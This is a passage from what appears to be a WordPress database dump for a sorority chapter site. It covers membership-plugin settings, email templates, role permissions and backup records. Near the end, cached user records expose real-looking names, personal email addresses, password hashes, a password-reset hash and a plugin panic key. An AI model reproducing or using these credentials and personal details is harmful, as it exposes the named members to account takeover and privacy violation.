below\";s:12:\"account_name\";s:1:\"1\";s:20:\"account_name_require\";s:1:\"1\";s:13:\"account_email\";s:1:\"1\";s:25:\"account_hide_in_directory\";s:1:\"1\";s:26:\"account_require_strongpass\";s:1:\"0\";s:9:\"panic_key\";s:10:\"vmTn4uCmF5\";s:10:\"accessible\";s:1:\"0\";s:15:\"access_redirect\";s:0:\"\";s:20:\"home_page_accessible\";s:1:\"1\";s:24:\"category_page_accessible\";s:1:\"1\";s:13:\"wpadmin_login\";s:1:\"0\";s:25:\"deny_admin_frontend_login\";s:1:\"0\";s:22:\"wpadmin_login_redirect\";s:13:\"um_login_page\";s:26:\"wpadmin_login_redirect_url\";s:0:\"\";s:16:\"wpadmin_register\";s:1:\"0\";s:25:\"wpadmin_register_redirect\";s:16:\"um_register_page\";s:29:\"wpadmin_register_redirect_url\";s:0:\"\";s:24:\"access_widget_admin_only\";s:1:\"1\";s:27:\"enable_reset_password_limit\";s:1:\"1\";s:27:\"reset_password_limit_number\";s:1:\"5\";s:34:\"disable_admin_reset_password_limit\";s:1:\"0\";s:17:\"wpadmin_allow_ips\";s:0:\"\";s:11:\"blocked_ips\";s:0:\"\";s:14:\"blocked_emails\";s:0:\"\";s:13:\"blocked_words\";s:47:\"admin\r\nadministrator\r\nwebmaster\r\nsupport\r\nstaff\";s:9:\"mail_from\";s:11:\"Development\";s:14:\"mail_from_addr\";s:15:\"pr@zphiblgz.org\";s:10:\"email_html\";s:1:\"0\";s:16:\"welcome_email_on\";s:1:\"0\";s:17:\"welcome_email_sub\";s:23:\"Welcome to {site_name}!\";s:13:\"welcome_email\";s:306:\"Hi {display_name},\r\n\r\nThank you for signing up with {site_name}! Your account is now active.\r\n\r\nTo login please visit the following url:\r\n\r\n{login_url}\r\n\r\nYour account e-mail: {email}\r\nYour account username: {username}\r\n\r\nIf you have any problems, please contact us at {admin_email}\r\n\r\nThanks,\r\n{site_name}\";s:18:\"checkmail_email_on\";s:1:\"1\";s:19:\"checkmail_email_sub\";s:28:\"Please activate your account\";s:15:\"checkmail_email\";s:266:\"Hi {display_name},\r\n\r\nThank you for signing up with {site_name}! To activate your account, please click the link below to confirm your email address:\r\n\r\n{account_activation_link}\r\n\r\nIf you have any problems, please contact us at {admin_email}\r\n\r\nThanks,\r\n{site_name}\";s:16:\"pending_email_on\";s:1:\"1\";s:17:\"pending_email_sub\";s:30:\"Your account is pending review\";s:13:\"pending_email\";s:272:\"Hi {display_name},\r\n\r\nThank you for signing up with {site_name}! Your account is currently being reviewed by a member of our team.\r\n\r\nPlease allow us some time to process your request.\r\n\r\nIf you have any problems, please contact us at {admin_email}\r\n\r\nThanks,\r\n{site_name}\";s:17:\"approved_email_on\";s:1:\"1\";s:18:\"approved_email_sub\";s:41:\"Your account at {site_name} is now active\";s:14:\"approved_email\";s:378:\"Hi {display_name},\r\n\r\nThank you for signing up with {site_name}! Your account has been approved and is now active.\r\n\r\nTo login please visit the following url:\r\n\r\n{login_url}\r\n\r\nYour account e-mail: {email}\r\nYour account username: {username}\r\nSet your account password: {password_reset_link}\r\n\r\nIf you have any problems, please contact us at {admin_email}\r\n\r\nThanks,\r\n{site_name}\";s:17:\"rejected_email_on\";s:1:\"1\";s:18:\"rejected_email_sub\";s:30:\"Your account has been rejected\";s:14:\"rejected_email\";s:260:\"Hi {display_name},\r\n\r\nThank you for applying for membership to {site_name}! We have reviewed your information and unfortunately we are unable to accept you as a member at this moment.\r\n\r\nPlease feel free to apply again at a future date.\r\n\r\nThanks,\r\n{site_name}\";s:17:\"inactive_email_on\";s:1:\"1\";s:18:\"inactive_email_sub\";s:33:\"Your account has been deactivated\";s:14:\"inactive_email\";s:222:\"Hi {display_name},\r\n\r\nThis is an automated email to let you know your {site_name} account has been deactivated.\r\n\r\nIf you would like your account to be reactivated please contact us at {admin_email}\r\n\r\nThanks,\r\n{site_name}\";s:17:\"deletion_email_on\";s:1:\"1\";s:18:\"deletion_email_sub\";s:29:\"Your account has been deleted\";s:14:\"deletion_email\";s:332:\"Hi {display_name},\r\n\r\nThis is an automated email to let you know your {site_name} account has been deleted. All of your personal information has been permanently deleted and you will no longer be able to login to {site_name}.\r\n\r\nIf your account has been deleted by accident please contact us at {admin_email}\r\n\r\nThanks,\r\n{site_name}\";s:16:\"resetpw_email_on\";s:1:\"1\";s:17:\"resetpw_email_sub\";s:19:\"Reset your password\";s:13:\"resetpw_email\";s:266:\"Hi {display_name},\r\n\r\nWe received a request to reset the password for your account. If you made this request, click the link below to change your password:\r\n\r\n{password_reset_link}\r\n\r\nIf you didn\'t make this request, you can ignore this email\r\n\r\nThanks,\r\n{site_name}\";s:18:\"changedpw_email_on\";s:1:\"1\";s:19:\"changedpw_email_sub\";s:42:\"Your {site_name} password has been changed\";s:15:\"changedpw_email\";s:279:\"Hi {display_name},\r\n\r\nYou recently changed the password associated with your {site_name} account.\r\n\r\nIf you did not make this change and believe your {site_name} account has been compromised, please contact us at the following email address: {admin_email}\r\n\r\nThanks,\r\n{site_name}\";s:11:\"admin_email\";s:15:\"pr@zphiblgz.org\";s:24:\"notification_new_user_on\";s:1:\"1\";s:25:\"notification_new_user_sub\";s:30:\"[{site_name}] New user account\";s:21:\"notification_new_user\";s:187:\"{display_name} has just created an account on {site_name}. To view their profile click here:\r\n\r\n{user_profile_link}\r\n\r\nHere is the submitted registration form:\r\n\r\n{submitted_registration}\";s:22:\"notification_review_on\";s:1:\"0\";s:23:\"notification_review_sub\";s:38:\"[{site_name}] New user awaiting review\";s:19:\"notification_review\";s:245:\"{display_name} has just applied for membership to {site_name} and is waiting to be reviewed.\r\n\r\nTo review this member please click the following link:\r\n\r\n{user_profile_link}\r\n\r\nHere is the submitted registration form:\r\n\r\n{submitted_registration}\";s:24:\"notification_deletion_on\";s:1:\"0\";s:25:\"notification_deletion_sub\";s:29:\"[{site_name}] Account deleted\";s:21:\"notification_deletion\";s:58:\"{display_name} has just deleted their {site_name} account.\";s:22:\"profile_photo_max_size\";s:0:\"\";s:20:\"cover_photo_max_size\";s:0:\"\";s:17:\"photo_thumb_sizes\";a:3:{i:0;s:2:\"40\";i:1;s:2:\"80\";i:2;s:3:\"190\";}s:17:\"cover_thumb_sizes\";a:2:{i:0;s:3:\"300\";i:1;s:3:\"600\";}s:17:\"image_compression\";s:2:\"60\";s:15:\"image_max_width\";s:4:\"1000\";s:15:\"cover_min_width\";s:4:\"1000\";s:13:\"profile_title\";s:28:\"{display_name} | Development\";s:12:\"profile_desc\";s:83:\"{display_name} is on {site_name}. Join {site_name} to view {display_name}\'s profile\";s:18:\"directory_template\";s:7:\"members\";s:12:\"active_color\";s:7:\"#3ba1da\";s:15:\"secondary_color\";s:7:\"#44b0ec\";s:17:\"primary_btn_color\";s:7:\"#3ba1da\";s:17:\"primary_btn_hover\";s:7:\"#44b0ec\";s:16:\"primary_btn_text\";s:7:\"#ffffff\";s:19:\"secondary_btn_color\";s:7:\"#eeeeee\";s:19:\"secondary_btn_hover\";s:7:\"#e5e5e5\";s:18:\"secondary_btn_text\";s:7:\"#666666\";s:14:\"help_tip_color\";s:7:\"#cccccc\";s:16:\"form_field_label\";s:7:\"#555555\";s:11:\"form_border\";s:14:\"2px solid #ddd\";s:17:\"form_border_hover\";s:14:\"2px solid #bbb\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:19:\"form_bg_color_focus\";s:7:\"#ffffff\";s:15:\"form_text_color\";s:7:\"#666666\";s:16:\"form_placeholder\";s:7:\"#aaaaaa\";s:15:\"form_icon_color\";s:7:\"#aaaaaa\";s:13:\"form_asterisk\";s:1:\"0\";s:19:\"form_asterisk_color\";s:7:\"#aaaaaa\";s:16:\"profile_template\";s:7:\"profile\";s:17:\"profile_max_width\";s:6:\"1000px\";s:22:\"profile_area_max_width\";s:5:\"600px\";s:13:\"profile_align\";s:6:\"center\";s:13:\"profile_icons\";s:5:\"label\";s:24:\"profile_primary_btn_word\";s:14:\"Update Profile\";s:21:\"profile_secondary_btn\";s:1:\"1\";s:26:\"profile_secondary_btn_word\";s:6:\"Cancel\";s:12:\"profile_role\";s:1:\"0\";s:15:\"profile_main_bg\";s:0:\"\";s:17:\"profile_header_bg\";s:0:\"\";s:14:\"default_avatar\";a:5:{s:3:\"url\";s:85:\"https://zphiblgz.org/wp-content/plugins/ultimate-member/assets/img/default_avatar.jpg\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:13:\"default_cover\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:17:\"profile_photosize\";s:5:\"190px\";s:19:\"profile_photocorner\";s:1:\"1\";s:21:\"profile_cover_enabled\";s:1:\"1\";s:19:\"profile_cover_ratio\";s:5:\"2.7:1\";s:21:\"profile_show_metaicon\";s:1:\"0\";s:19:\"profile_header_text\";s:7:\"#999999\";s:25:\"profile_header_link_color\";s:7:\"#555555\";s:26:\"profile_header_link_hcolor\";s:7:\"#444444\";s:25:\"profile_header_icon_color\";s:7:\"#aaaaaa\";s:26:\"profile_header_icon_hcolor\";s:7:\"#3ba1da\";s:17:\"profile_show_name\";s:1:\"1\";s:25:\"profile_show_social_links\";s:1:\"0\";s:16:\"profile_show_bio\";s:1:\"1\";s:21:\"profile_show_html_bio\";s:0:\"\";s:20:\"profile_bio_maxchars\";s:3:\"180\";s:19:\"profile_header_menu\";s:2:\"bc\";s:18:\"profile_empty_text\";s:1:\"1\";s:22:\"profile_empty_text_emo\";s:1:\"1\";s:12:\"profile_menu\";s:1:\"1\";s:16:\"profile_tab_main\";s:1:\"1\";s:24:\"profile_tab_main_privacy\";s:1:\"0\";s:17:\"profile_tab_posts\";s:1:\"1\";s:25:\"profile_tab_posts_privacy\";s:1:\"0\";s:20:\"profile_tab_comments\";s:1:\"1\";s:28:\"profile_tab_comments_privacy\";s:1:\"0\";s:24:\"profile_menu_default_tab\";s:4:\"main\";s:18:\"profile_menu_icons\";s:1:\"1\";s:17:\"register_template\";s:8:\"register\";s:18:\"register_max_width\";s:5:\"450px\";s:14:\"register_align\";s:6:\"center\";s:14:\"register_icons\";s:5:\"label\";s:25:\"register_primary_btn_word\";s:8:\"Register\";s:22:\"register_secondary_btn\";s:1:\"1\";s:27:\"register_secondary_btn_word\";s:5:\"Login\";s:26:\"register_secondary_btn_url\";s:0:\"\";s:13:\"register_role\";s:1:\"0\";s:14:\"login_template\";s:5:\"login\";s:15:\"login_max_width\";s:5:\"450px\";s:11:\"login_align\";s:6:\"center\";s:11:\"login_icons\";s:5:\"label\";s:22:\"login_primary_btn_word\";s:5:\"Login\";s:19:\"login_secondary_btn\";s:1:\"1\";s:24:\"login_secondary_btn_word\";s:8:\"Register\";s:23:\"login_secondary_btn_url\";s:0:\"\";s:22:\"login_forgot_pass_link\";s:1:\"1\";s:21:\"login_show_rememberme\";s:1:\"1\";s:28:\"um_profile_object_cache_stop\";s:1:\"0\";s:13:\"um_flush_stop\";s:1:\"0\";s:29:\"um_generate_slug_in_directory\";s:1:\"0\";s:18:\"current_url_method\";s:11:\"SERVER_NAME\";s:22:\"um_port_forwarding_url\";s:1:\"0\";s:21:\"um_force_utf8_strings\";s:1:\"0\";s:14:\"enable_timebot\";s:1:\"1\";s:14:\"disable_minify\";s:1:\"0\";s:12:\"disable_menu\";s:1:\"0\";s:19:\"js_css_exlcude_home\";s:1:\"0\";s:17:\"enable_custom_css\";s:1:\"0\";s:14:\"allow_tracking\";s:1:\"0\";s:24:\"addon_bp_avatar_transfer\";s:0:\"\";s:23:\"addon_gravatar_transfer\";s:0:\"\";s:27:\"addon_generate_random_users\";s:0:\"\";s:17:\"addon_system_info\";s:0:\"\";s:19:\"access_exclude_uris\";a:0:{}s:22:\"profile_tab_main_roles\";s:0:\"\";s:23:\"profile_tab_posts_roles\";s:0:\"\";s:26:\"profile_tab_comments_roles\";s:0:\"\";s:14:\"js_css_exclude\";a:0:{}s:14:\"js_css_include\";a:0:{}}','yes'),(537,'um_first_setup_roles','1','yes'),(538,'um_hashed_passwords_fix','1','yes'),(540,'redux_version_upgraded_from','3.6.0.1','yes'),(543,'um_options-transients','a:3:{s:14:\"changed_values\";a:3:{s:9:\"core_user\";s:3:\"547\";s:12:\"core_members\";s:3:\"553\";s:10:\"core_login\";s:3:\"549\";}s:9:\"last_save\";i:1480894643;s:13:\"last_compiler\";i:1480893879;}','yes'),(548,'um_cached_role_member','a:16:{s:4:\"role\";s:6:\"member\";s:4:\"core\";s:6:\"member\";s:18:\"can_access_wpadmin\";s:1:\"0\";s:20:\"can_not_see_adminbar\";s:1:\"1\";s:17:\"can_edit_everyone\";s:1:\"0\";s:19:\"can_delete_everyone\";s:1:\"0\";s:16:\"can_edit_profile\";s:1:\"1\";s:18:\"can_delete_profile\";s:1:\"1\";s:12:\"can_view_all\";s:1:\"1\";s:24:\"can_make_private_profile\";s:1:\"0\";s:26:\"can_access_private_profile\";s:1:\"0\";s:16:\"default_homepage\";s:1:\"1\";s:6:\"status\";s:8:\"approved\";s:16:\"auto_approve_act\";s:16:\"redirect_profile\";s:11:\"after_login\";s:16:\"redirect_profile\";s:12:\"after_logout\";s:13:\"redirect_home\";}','yes'),(563,'um_existing_rows_543','a:1:{i:0;s:9:\"_um_row_1\";}','yes'),(564,'um_form_rowdata_543','a:1:{s:9:\"_um_row_1\";a:5:{s:4:\"type\";s:3:\"row\";s:2:\"id\";s:9:\"_um_row_1\";s:8:\"sub_rows\";s:1:\"1\";s:4:\"cols\";s:1:\"1\";s:6:\"origin\";s:9:\"_um_row_1\";}}','yes'),(571,'widget_um_login_widget','a:2:{i:2;a:1:{s:5:\"title\";s:13:\"Member Login \";}s:12:\"_multiwidget\";i:1;}','yes'),(579,'um_can_register_notice','1','yes'),(677,'WPLANG','','yes'),(863,'category_45','a:3:{s:14:\"_um_accessible\";s:1:\"0\";s:12:\"_um_redirect\";s:0:\"\";s:9:\"_um_roles\";s:0:\"\";}','yes'),(865,'category_46','a:3:{s:14:\"_um_accessible\";s:1:\"0\";s:12:\"_um_redirect\";s:0:\"\";s:9:\"_um_roles\";s:0:\"\";}','yes'),(2275,'akismet_strictness','0','yes'),(1564,'pr_options','a:7:{s:5:\"pages\";a:1:{i:0;s:3:\"606\";}s:5:\"posts\";N;s:6:\"method\";s:8:\"selected\";s:7:\"version\";s:4:\"2.02\";s:7:\"message\";s:44:\"You are required to login to view this page.\";s:9:\"loginform\";b:0;s:16:\"pr_restrict_home\";i:0;}','yes'),(914,'sp_zip_cleanup_cron','1','yes'),(915,'sp_client_upload','2.6.5.3','yes'),(916,'sp_client_upload_page','Please enter the page','yes'),(917,'sp_cu_event_logger_installer','installed','yes'),(918,'cdm_projects_upgrade','1','yes'),(953,'sp_cu_thankyou','Thank you. Your upload is complete. ','yes'),(949,'cdm_nonce','09439e70de','yes'),(951,'sp_cu_company_name','Zeta Phi Beta Sorority, Inc. Lambda Gamma Zeta Chapter of Howard County ','yes'),(952,'sp_cu_filename_format','%y-%m-%d-','yes'),(954,'sp_cu_delete','','yes'),(955,'sp_cu_user_uploads_disable','1','yes'),(956,'sp_cu_user_delete_disable','1','yes'),(957,'sp_cu_folder_name_single','','yes'),(958,'sp_cu_folder_name_plural','','yes'),(959,'sp_cu_form_instructions','','yes'),(960,'save_options','Save Options','yes'),(961,'sp_cu_additional_admin_emails','','yes'),(962,'sp_cu_admin_email_subject','','yes'),(963,'sp_cu_admin_email','','yes'),(964,'sp_cu_additional_user_emails','','yes'),(965,'sp_cu_user_email_subject','','yes'),(966,'sp_cu_user_email','','yes'),(967,'sp_cu_admin_user_email_subject','','yes'),(968,'sp_cu_admin_user_email','','yes'),(969,'sp_cu_vendor_email_subject','','yes'),(970,'sp_cu_vendor_email_cc','','yes'),(971,'sp_cu_vendor_email','','yes'),(972,'sp_cu_overide_upload_path','','yes'),(973,'sp_cu_overide_upload_url','','yes'),(974,'sp_cu_wp_folder','','yes'),(975,'sp_cu_disabled_users','','yes'),(976,'sp_cu_disabled_users_error','','yes'),(977,'sp_cdm_disable_features','','yes'),(978,'sp_cu_user_projects','0','yes'),(979,'sp_cu_user_projects_required','0','yes'),(980,'sp_cu_js_redirect','0','yes'),(981,'sp_cu_hide_project','0','yes'),(982,'sp_cu_user_require_login_download','0','yes'),(983,'sp_cu_user_projects_modify','0','yes'),(984,'sp_cu_user_disable_search','0','yes'),(1292,'um_cached_role_member-only-admin','a:30:{s:4:\"role\";s:17:\"member-only-admin\";s:11:\"synced_role\";s:10:\"subscriber\";s:18:\"can_access_wpadmin\";s:1:\"0\";s:20:\"can_not_see_adminbar\";s:1:\"1\";s:17:\"can_edit_everyone\";s:1:\"0\";s:19:\"can_delete_everyone\";s:1:\"0\";s:16:\"can_edit_profile\";s:1:\"0\";s:18:\"can_delete_profile\";s:1:\"0\";s:12:\"can_view_all\";s:1:\"0\";s:24:\"can_make_private_profile\";s:1:\"0\";s:26:\"can_access_private_profile\";s:1:\"0\";s:16:\"default_homepage\";s:1:\"1\";s:17:\"redirect_homepage\";s:0:\"\";s:6:\"status\";s:7:\"pending\";s:16:\"auto_approve_act\";s:16:\"redirect_profile\";s:16:\"auto_approve_url\";s:0:\"\";s:20:\"login_email_activate\";s:1:\"0\";s:16:\"checkmail_action\";s:12:\"show_message\";s:17:\"checkmail_message\";s:147:\"Thank you for registering. Before you can login we need you to activate your account by clicking the activation link in the email we just sent you.\";s:13:\"checkmail_url\";s:0:\"\";s:18:\"url_email_activate\";s:0:\"\";s:14:\"pending_action\";s:12:\"show_message\";s:15:\"pending_message\";s:11:\"Thank you. \";s:11:\"pending_url\";s:0:\"\";s:11:\"after_login\";s:12:\"redirect_url\";s:18:\"login_redirect_url\";s:41:\"www.development.zphiblgz.org/members-only\";s:12:\"after_logout\";s:13:\"redirect_home\";s:19:\"logout_redirect_url\";s:0:\"\";s:12:\"after_delete\";s:13:\"redirect_home\";s:19:\"delete_redirect_url\";s:0:\"\";}','yes'),(17691,'wpclone_directory_scan','a:4:{s:6:\"dbsize\";s:7:\"2.35 MB\";s:4:\"size\";s:7:\"6.27 GB\";s:5:\"files\";i:3550;s:4:\"time\";i:1484540241;}','yes'),(17692,'wpclone_backups','a:1:{i:1484540528;a:4:{s:4:\"name\";s:55:\"wpclone_backup_15th_Jan_2017_11-21PM_Zet_PFow1Vuh0p.zip\";s:3:\"log\";s:55:\"wpclone_backup_15th_Jan_2017_11-21PM_Zet_PFow1Vuh0p.log\";s:7:\"creator\";s:15:\"pr@zphiblgz.org\";s:4:\"size\";i:482017361;}}','yes'),(1029,'ure_tasks_queue','a:0:{}','yes'),(2173,'um_cache_userdata_2','a:71:{s:2:\"ID\";i:2;s:10:\"user_login\";s:9:\"cwhitaker\";s:9:\"user_pass\";s:34:\"$P$BMOhd24Gq4lPQeYjAf1qkAX3xxb9zN1\";s:13:\"user_nicename\";s:9:\"cwhitaker\";s:10:\"user_email\";s:28:\"crystal.whitaker22@gmail.com\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2016-12-04 14:43:16\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:16:\"Crystal Whitaker\";s:10:\"subscriber\";b:1;s:8:\"wp_roles\";s:10:\"subscriber\";s:12:\"cuar_pf_read\";b:1;s:4:\"read\";b:1;s:6:\"sp_cdm\";b:1;s:26:\"sp_cdm_show_folders_as_nav\";b:1;s:15:\"sp_cdm_uploader\";b:1;s:6:\"filter\";N;s:8:\"nickname\";s:9:\"cwhitaker\";s:10:\"first_name\";s:7:\"Crystal\";s:9:\"last_name\";s:8:\"Whitaker\";s:11:\"description\";s:0:\"\";s:12:\"rich_editing\";s:4:\"true\";s:17:\"comment_shortcuts\";s:5:\"false\";s:11:\"admin_color\";s:5:\"fresh\";s:7:\"use_ssl\";s:1:\"0\";s:20:\"show_admin_bar_front\";s:4:\"true\";s:20:\"wp_tegx_capabilities\";s:28:\"a:1:{s:10:\"subscriber\";b:1;}\";s:18:\"wp_tegx_user_level\";s:1:\"0\";s:35:\"um_user_profile_url_slug_user_login\";s:9:\"cwhitaker\";s:34:\"manageedit-shop_ordercolumnshidden\";s:33:\"a:1:{i:0;s:15:\"billing_address\";}\";s:14:\"account_status\";s:8:\"approved\";s:14:\"_um_last_login\";s:10:\"1480865297\";s:4:\"role\";s:6:\"member\";s:18:\"billing_first_name\";s:0:\"\";s:17:\"billing_last_name\";s:0:\"\";s:15:\"billing_company\";s:0:\"\";s:17:\"billing_address_1\";s:0:\"\";s:17:\"billing_address_2\";s:0:\"\";s:12:\"billing_city\";s:0:\"\";s:16:\"billing_postcode\";s:0:\"\";s:15:\"billing_country\";s:0:\"\";s:13:\"billing_state\";s:0:\"\";s:13:\"billing_phone\";s:0:\"\";s:13:\"billing_email\";s:0:\"\";s:19:\"shipping_first_name\";s:0:\"\";s:18:\"shipping_last_name\";s:0:\"\";s:16:\"shipping_company\";s:0:\"\";s:18:\"shipping_address_1\";s:0:\"\";s:18:\"shipping_address_2\";s:0:\"\";s:13:\"shipping_city\";s:0:\"\";s:17:\"shipping_postcode\";s:0:\"\";s:16:\"shipping_country\";s:0:\"\";s:14:\"shipping_state\";s:0:\"\";s:11:\"last_update\";s:10:\"1480865416\";s:19:\"account_status_name\";s:8:\"Approved\";s:4:\"core\";s:6:\"member\";s:18:\"can_access_wpadmin\";s:1:\"0\";s:20:\"can_not_see_adminbar\";s:1:\"1\";s:17:\"can_edit_everyone\";s:1:\"0\";s:19:\"can_delete_everyone\";s:1:\"0\";s:16:\"can_edit_profile\";s:1:\"1\";s:18:\"can_delete_profile\";s:1:\"1\";s:12:\"can_view_all\";s:1:\"1\";s:24:\"can_make_private_profile\";s:1:\"0\";s:26:\"can_access_private_profile\";s:1:\"0\";s:16:\"default_homepage\";s:1:\"1\";s:6:\"status\";s:8:\"approved\";s:16:\"auto_approve_act\";s:16:\"redirect_profile\";s:11:\"after_login\";s:16:\"redirect_profile\";s:12:\"after_logout\";s:13:\"redirect_home\";s:11:\"super_admin\";i:0;}','yes'),(1139,'dms_db_version','1.04','yes'),(2214,'um_cache_userdata_3','a:90:{s:2:\"ID\";i:3;s:10:\"user_login\";s:8:\"Testing1\";s:9:\"user_pass\";s:34:\"$P$B5RAl9MjaVzseG28IQJC2t1VBmqsYf0\";s:13:\"user_nicename\";s:8:\"testing1\";s:10:\"user_email\";s:26:\"crystal.clear84@icloud.com\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2016-12-04 19:30:29\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:8:\"Testing1\";s:10:\"subscriber\";b:1;s:8:\"wp_roles\";s:10:\"subscriber\";s:12:\"cuar_pf_read\";b:1;s:4:\"read\";b:1;s:6:\"sp_cdm\";b:1;s:26:\"sp_cdm_show_folders_as_nav\";b:1;s:15:\"sp_cdm_uploader\";b:1;s:6:\"filter\";N;s:8:\"nickname\";s:8:\"Testing1\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:12:\"rich_editing\";s:4:\"true\";s:17:\"comment_shortcuts\";s:5:\"false\";s:11:\"admin_color\";s:5:\"fresh\";s:7:\"use_ssl\";s:1:\"0\";s:20:\"show_admin_bar_front\";s:4:\"true\";s:20:\"wp_tegx_capabilities\";s:28:\"a:1:{s:10:\"subscriber\";b:1;}\";s:18:\"wp_tegx_user_level\";s:1:\"0\";s:4:\"role\";s:17:\"member-only-admin\";s:9:\"submitted\";N;s:35:\"um_user_profile_url_slug_user_login\";s:8:\"testing1\";s:11:\"last_update\";s:10:\"1480882997\";s:9:\"full_name\";s:8:\"testing1\";s:15:\"reset_pass_hash\";s:40:\"DdID8hXE6LVuL1tlaqiMVUKDKOitzWV78PPaaqQw\";s:14:\"account_status\";s:8:\"approved\";s:34:\"manageedit-shop_ordercolumnshidden\";s:33:\"a:1:{i:0;s:15:\"billing_address\";}\";s:18:\"billing_first_name\";s:0:\"\";s:17:\"billing_last_name\";s:0:\"\";s:15:\"billing_company\";s:0:\"\";s:17:\"billing_address_1\";s:0:\"\";s:17:\"billing_address_2\";s:0:\"\";s:12:\"billing_city\";s:0:\"\";s:16:\"billing_postcode\";s:0:\"\";s:15:\"billing_country\";s:0:\"\";s:13:\"billing_state\";s:0:\"\";s:13:\"billing_phone\";s:0:\"\";s:13:\"billing_email\";s:0:\"\";s:19:\"shipping_first_name\";s:0:\"\";s:18:\"shipping_last_name\";s:0:\"\";s:16:\"shipping_company\";s:0:\"\";s:18:\"shipping_address_1\";s:0:\"\";s:18:\"shipping_address_2\";s:0:\"\";s:13:\"shipping_city\";s:0:\"\";s:17:\"shipping_postcode\";s:0:\"\";s:16:\"shipping_country\";s:0:\"\";s:14:\"shipping_state\";s:0:\"\";s:12:\"last_project\";N;s:24:\"um_account_secure_fields\";s:2408:\"a:4:{s:7:\"general\";a:4:{s:10:\"user_login\";a:10:{s:5:\"title\";s:8:\"Username\";s:7:\"metakey\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:8:\"Username\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:0;s:8:\"validate\";s:15:\"unique_username\";s:9:\"min_chars\";i:3;s:9:\"max_chars\";i:24;}s:10:\"first_name\";a:7:{s:5:\"title\";s:10:\"First Name\";s:7:\"metakey\";s:10:\"first_name\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"editable\";i:1;}s:9:\"last_name\";a:7:{s:5:\"title\";s:9:\"Last Name\";s:7:\"metakey\";s:9:\"last_name\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"editable\";i:1;}s:10:\"user_email\";a:7:{s:5:\"title\";s:14:\"E-mail Address\";s:7:\"metakey\";s:10:\"user_email\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:14:\"E-mail Address\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"validate\";s:12:\"unique_email\";}}s:8:\"password\";a:1:{s:13:\"user_password\";a:11:{s:5:\"title\";s:8:\"Password\";s:7:\"metakey\";s:13:\"user_password\";s:4:\"type\";s:8:\"password\";s:5:\"label\";s:8:\"Password\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:9:\"min_chars\";i:8;s:9:\"max_chars\";i:30;s:15:\"force_good_pass\";i:1;s:18:\"force_confirm_pass\";i:1;}}s:7:\"privacy\";a:2:{s:15:\"profile_privacy\";a:13:{s:5:\"title\";s:15:\"Profile Privacy\";s:7:\"metakey\";s:15:\"profile_privacy\";s:4:\"type\";s:6:\"select\";s:5:\"label\";s:15:\"Profile Privacy\";s:4:\"help\";s:32:\"Who can see your public profile?\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:7:\"default\";s:8:\"Everyone\";s:7:\"options\";a:2:{i:0;s:8:\"Everyone\";i:1;s:7:\"Only me\";}s:10:\"allowclear\";i:0;s:12:\"account_only\";b:1;s:13:\"required_perm\";s:24:\"can_make_private_profile\";}s:15:\"hide_in_members\";a:12:{s:5:\"title\";s:30:\"Hide my profile from directory\";s:7:\"metakey\";s:15:\"hide_in_members\";s:4:\"type\";s:5:\"radio\";s:5:\"label\";s:30:\"Hide my profile from directory\";s:4:\"help\";s:61:\"Here you can hide yourself from appearing in public directory\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:7:\"default\";s:2:\"No\";s:7:\"options\";a:2:{i:0;s:2:\"No\";i:1;s:3:\"Yes\";}s:12:\"account_only\";b:1;s:12:\"required_opt\";a:2:{i:0;s:12:\"members_page\";i:1;i:1;}}}s:6:\"delete\";a:1:{s:20:\"single_user_password\";a:8:{s:5:\"title\";s:8:\"Password\";s:7:\"metakey\";s:20:\"single_user_password\";s:4:\"type\";s:8:\"password\";s:5:\"label\";s:8:\"Password\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:12:\"account_only\";b:1;}}}\";s:14:\"_um_last_login\";s:10:\"1480946422\";s:19:\"account_status_name\";s:8:\"Approved\";s:11:\"synced_role\";s:10:\"subscriber\";s:18:\"can_access_wpadmin\";s:1:\"0\";s:20:\"can_not_see_adminbar\";s:1:\"1\";s:17:\"can_edit_everyone\";s:1:\"0\";s:19:\"can_delete_everyone\";s:1:\"0\";s:16:\"can_edit_profile\";s:1:\"0\";s:18:\"can_delete_profile\";s:1:\"0\";s:12:\"can_view_all\";s:1:\"0\";s:24:\"can_make_private_profile\";s:1:\"0\";s:26:\"can_access_private_profile\";s:1:\"0\";s:16:\"default_homepage\";s:1:\"1\";s:17:\"redirect_homepage\";s:0:\"\";s:6:\"status\";s:7:\"pending\";s:16:\"auto_approve_act\";s:16:\"redirect_profile\";s:16:\"auto_approve_url\";s:0:\"\";s:20:\"login_email_activate\";s:1:\"0\";s:16:\"checkmail_action\";s:12:\"show_message\";s:17:\"checkmail_message\";s:147:\"Thank you for registering. Before you can login we need you to activate your account by clicking the activation link in the email we just sent you.\";s:13:\"checkmail_url\";s:0:\"\";s:18:\"url_email_activate\";s:0:\"\";s:14:\"pending_action\";s:12:\"show_message\";s:15:\"pending_message\";s:11:\"Thank you. 